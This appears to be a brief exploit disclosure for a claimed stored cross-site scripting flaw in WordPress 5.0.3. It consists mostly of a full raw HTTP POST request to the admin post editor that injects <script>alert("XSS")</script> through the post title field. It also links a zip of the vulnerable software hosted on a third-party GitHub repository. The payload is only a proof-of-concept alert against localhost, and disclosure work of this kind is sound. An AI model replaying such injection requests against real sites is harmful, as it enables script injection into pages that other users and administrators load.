WordPress 5.0.3 Stored Cross-Site Scripting

WordPress 5.0.3 Stored Cross-Site Scripting Vulnerability

Proof of Concept

To exploit vulnerability, Allows it to run a Stored Cross-Site Scripting by saving a new title or rename

Vulnerable Software

Vulnerable Software --> [ https://github.com/rdincel1/WordPress-5.0.3-Stored-Cross-Site-Scripting-Vulnerability/raw/master/wordpress-5.0.3.zip ]

POST http://localhost/wordpress-5.0.3/wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:  http://localhost/wordpress-5.0.3/wordpress/wp-admin/post-new.php?wp-post-new-reload=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 1924
Connection: close
Cookie: XXXXXXXXXXXXXXXXXXXXXXXX

_wpnonce=2e1618e21d&_wp_http_referer=/wp-admin/post-new.php&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=post&original_post_status=auto-draft&referredby=http://localhost/wordpress-5.0.3/wordpress/wp-admin/edit.php&_wp_original_http_referer=http://localhost/wordpress-5.0.3/wordpress/wp-admin/edit.php&auto_draft=&post_ID=563&meta-box-order-nonce=fb88e0133c&closedpostboxesnonce=b0682c0840&post_title=<script>alert("XSS")</script>&samplepermalinknonce=c52f311a11&_elementor_edit_mode_nonce=e4caa3d3b2&_wp_http_referer=/wp-admin/post-new.php&_elementor_post_mode=&content=&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&jj=09&mm=02&aa=2019&hh=19&mn=51&ss=02&hidden_mm=02&cur_mm=02&hidden_jj=09&cur_jj=09&hidden_aa=2019&cur_aa=2019&hidden_hh=19&cur_hh=19&hidden_mn=51&cur_mn=51&original_publish=Yayımla&publish=Yayımla&post_category[]=0&newcategory=Yeni kategori ismi&newcategory_parent=-1&_ajax_nonce-add-category=723b9109b4&tax_input[post_tag]=&newtag[post_tag]=&_thumbnail_id=-1&wordpress-https=3c6203c4d8&_wp_http_referer=/wp-admin/post-new.php&page_template=default&aiosp_edit=aiosp_edit&nonce-aioseop-edit=c697d839e3&aiosp_title=&length1=22&aiosp_description=&length2=0&excerpt=&trackback_url=&metakeyselect=#NONE#&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61c1b838c1&advanced_view=1&comment_status=open&post_name=&post_author_override=1&_the_champ_meta[linkedin_horizontal_count]=&_the_champ_meta[twitter_horizontal_count]=&_the_champ_meta[facebook_horizontal_count]=&_the_champ_meta[reddit_horizontal_count]=&_the_champ_meta[linkedin_vertical_count]=&_the_champ_meta[twitter_vertical_count]=&_the_champ_meta[facebook_vertical_count]=&_the_champ_meta[reddit_vertical_count]=&the_champ_meta_nonce=c163f87048

Proof of Concept (Video)

Screenshots